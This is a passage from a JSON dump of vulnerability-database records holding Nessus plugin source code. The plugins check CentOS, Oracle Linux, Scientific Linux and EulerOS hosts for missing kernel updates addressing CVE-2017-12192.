\"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-18T15:02:14", "description": "The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2430 advisory.\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on negative key (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-06-11T00:00:00", "type": "nessus", "title": "CentOS 6 : kernel (CESA-2020:2430)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12192"], "modified": "2020-06-18T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-debug-devel", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-firmware", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2020-2430.NASL", "href": "https://www.tenable.com/plugins/nessus/137336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2020:2430 and \n# CentOS Errata and Security Advisory 2020:2430 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137336);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/18\");\n\n script_cve_id(\"CVE-2017-12192\");\n script_xref(name:\"RHSA\", value:\"2020:2430\");\n\n script_name(english:\"CentOS 6 : kernel (CESA-2020:2430)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2430 advisory.\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on\n negative key (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2020-June/035753.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f272de0f\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12192\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-abi-whitelists-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-devel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-devel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-doc-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-firmware-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-headers-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perf-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-perf-2.6.32-754.30.2.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:57", "description": "The remote Oracle Linux 6 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2020-2430 advisory.\n\n - The keyctl_read_key function in security/keys/keyctl.c in the Key Management subcomponent in the Linux kernel before 4.13.5 does not properly consider that a key may be possessed but negatively instantiated, which allows local users to cause a denial of service (OOPS and system crash) via a crafted KEYCTL_READ operation. (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-06-11T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : kernel (ELSA-2020-2430)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12192"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-firmware", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2020-2430.NASL", "href": "https://www.tenable.com/plugins/nessus/137346", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2020-2430.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137346);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2017-12192\");\n script_xref(name:\"RHSA\", value:\"2020:2430\");\n\n script_name(english:\"Oracle Linux 6 : kernel (ELSA-2020-2430)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2020-2430 advisory.\n\n - The keyctl_read_key function in security/keys/keyctl.c in the Key Management subcomponent in the Linux\n kernel before 4.13.5 does not properly consider that a key may be possessed but negatively instantiated,\n which allows local users to cause a denial of service (OOPS and system crash) via a crafted KEYCTL_READ\n operation. (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2020-2430.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12192\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['2.6.32-754.30.2.el6'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2020-2430');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '2.6';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'kernel-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-2.6.32'},\n {'reference':'kernel-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-2.6.32'},\n {'reference':'kernel-abi-whitelists-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-abi-whitelists-2.6.32'},\n {'reference':'kernel-debug-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-2.6.32'},\n {'reference':'kernel-debug-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-2.6.32'},\n {'reference':'kernel-debug-devel-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-devel-2.6.32'},\n {'reference':'kernel-debug-devel-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-devel-2.6.32'},\n {'reference':'kernel-devel-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-devel-2.6.32'},\n {'reference':'kernel-devel-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-devel-2.6.32'},\n {'reference':'kernel-firmware-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-firmware-2.6.32'},\n {'reference':'kernel-headers-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-headers-2.6.32'},\n {'reference':'kernel-headers-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-headers-2.6.32'},\n {'reference':'perf-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perf-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-perf-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-perf-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel / kernel-abi-whitelists / kernel-debug / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:00", "description": "Security Fix(es) :\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on negative key (CVE-2017-12192)", "cvss3": {}, "published": "2020-06-11T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20200610)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12192"], "modified": "2020-12-23T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:kernel-firmware", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20200610_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/137347", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137347);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/23\");\n\n script_cve_id(\"CVE-2017-12192\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20200610)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security Fix(es) :\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on\n negative key (CVE-2017-12192)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind2006&L=SCIENTIFIC-LINUX-ERRATA&P=4349\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c6f9d851\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12192\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-abi-whitelists-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-debuginfo-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-common-i686-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-headers-2.6.32-754.30.2.el6\")) 